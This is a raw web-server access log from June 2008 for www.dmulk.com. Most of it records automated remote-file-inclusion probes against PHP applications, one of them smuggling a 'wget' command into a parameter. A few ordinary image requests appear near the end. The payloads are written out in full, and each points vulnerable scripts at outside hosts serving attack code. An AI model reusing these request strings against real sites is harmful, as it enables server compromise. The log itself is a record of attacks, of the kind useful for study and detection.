66.230.197.245 - - [08/Jun/2008:09:39:29 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:09:39:29 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:39:32 -0700] "GET /logs/access_080115.log/skins/advanced/advanced1.php?pluginpath[0]=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.150 - - [08/Jun/2008:09:39:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.elnuevedemorteros.com.ar/images/index.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.190.202.150 - - [08/Jun/2008:09:39:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.elnuevedemorteros.com.ar/images/index.html?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:09:40:10 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:09:40:12 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16852 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:40:13 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:09:40:30 -0700] "GET /logs/access_080312.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.133.235 - - [08/Jun/2008:09:40:36 -0700] "GET /logs//errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.55.133.235 - - [08/Jun/2008:09:40:36 -0700] "GET //errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
205.234.253.134 - - [08/Jun/2008:09:40:52 -0700] "GET /logs//errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
205.234.253.134 - - [08/Jun/2008:09:40:52 -0700] "GET //errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:40:57 -0700] "GET /logs//phphtml.php?htmlclass_path=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:40:58 -0700] "GET //phphtml.php?htmlclass_path=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:41:04 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:41:04 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 50 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [08/Jun/2008:09:41:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.autodelen.net/beelden/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:09:41:09 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:09:41:10 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:41:17 -0700] "GET /logs/access.log//citywriter/head.php?path=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:41:18 -0700] "GET //citywriter/head.php?path=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:41:18 -0700] "GET /logs//citywriter/head.php?path=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.158.114.6 - - [08/Jun/2008:09:41:22 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.800" "www.dmulk.com"
200.180.48.146 - - [08/Jun/2008:09:41:22 -0700] "GET //errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
200.180.48.146 - - [08/Jun/2008:09:41:22 -0700] "GET /logs//errors.php?error=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
190.144.44.36 - - [08/Jun/2008:09:41:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://syl0003.sync-intertainment.com/~d298238/images/index.html?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
190.144.44.36 - - [08/Jun/2008:09:41:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://syl0003.sync-intertainment.com/~d298238/images/index.html?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:41:34 -0700] "GET /logs/access_080321.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:41:36 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16936 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.222.50 - - [08/Jun/2008:09:41:37 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:41:51 -0700] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:41:52 -0700] "GET /init_basic.php?GALLERY_BASEDIR=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:42:01 -0700] "GET /logs/index.php?redir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:42:02 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:42:02 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:42:04 -0700] "GET /index.php?redir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 200 16798 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:09:42:08 -0700] "GET /logs/access_080429.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:09:42:08 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:09:42:09 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:42:45 -0700] "GET /logs/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:09:42:45 -0700] "GET /errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:43:00 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:43:01 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:43:01 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:43:19 -0700] "GET /logs/access_080513.log//22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:43:20 -0700] "GET //22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:09:43:20 -0700] "GET /logs//22_ultimate/templates/header.php?mainpath=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:43:20 -0700] "GET /logs/access.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:43:20 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.215.99 - - [08/Jun/2008:09:43:21 -0700] "GET /logs//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:09:43:33 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:09:43:35 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16850 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:44:31 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:44:31 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [08/Jun/2008:09:44:31 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:44:34 -0700] "GET /logs/access_080309.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:09:44:53 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [08/Jun/2008:09:44:53 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:09:45:03 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:09:45:04 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:09:45:04 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.113.151.18 - - [08/Jun/2008:09:45:14 -0700] "GET /main.php?id=http://www.monstrengo.com/m_pictures/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.113.151.18 - - [08/Jun/2008:09:45:14 -0700] "GET /logs/main.php?id=http://www.monstrengo.com/m_pictures/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:09:45:32 -0700] "GET /page.php?doc=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.246.21.79 - - [08/Jun/2008:09:46:18 -0700] "GET //errors.php?error=http://www.lars-geiger.de/ok/components/com_extcalendar/images/minipics/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:09:46:26 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:09:46:29 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
143.107.137.222 - - [08/Jun/2008:09:46:32 -0700] "GET /logs/access_080215.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:09:46:39 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:09:46:40 -0700] "GET //admin/index.php?o=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:09:46:40 -0700] "GET /logs//admin/index.php?o=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:46:47 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 200 64790 "http://www.st-owners.com/forums/showthread.php?t=32353&page=6" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
64.118.88.84 - - [08/Jun/2008:09:47:10 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://feuerwehr.k%FCnzell-bachrain.de/cms/components/com_easybook/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [08/Jun/2008:09:47:10 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://feuerwehr.k%FCnzell-bachrain.de/cms/components/com_easybook/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [08/Jun/2008:09:47:10 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://feuerwehr.k%FCnzell-bachrain.de/cms/components/com_easybook/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:47:17 -0700] "GET /logs/access.log/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:47:18 -0700] "GET /index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16854 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:09:47:20 -0700] "GET /logs/index.php?pagina=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:47:22 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:47:23 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.188.13 - - [08/Jun/2008:09:47:23 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:47:24 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:47:24 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:47:24 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:27 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:27 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:29 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:31 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:32 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:32 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:33 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:33 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:47:34 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:47:34 -0700] "GET //config/dbutil.bck.php?confdir=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:34 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
85.114.141.48 - - [08/Jun/2008:09:47:34 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://vennom.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:35 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:35 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:36 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.46.202.219 - - [08/Jun/2008:09:47:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
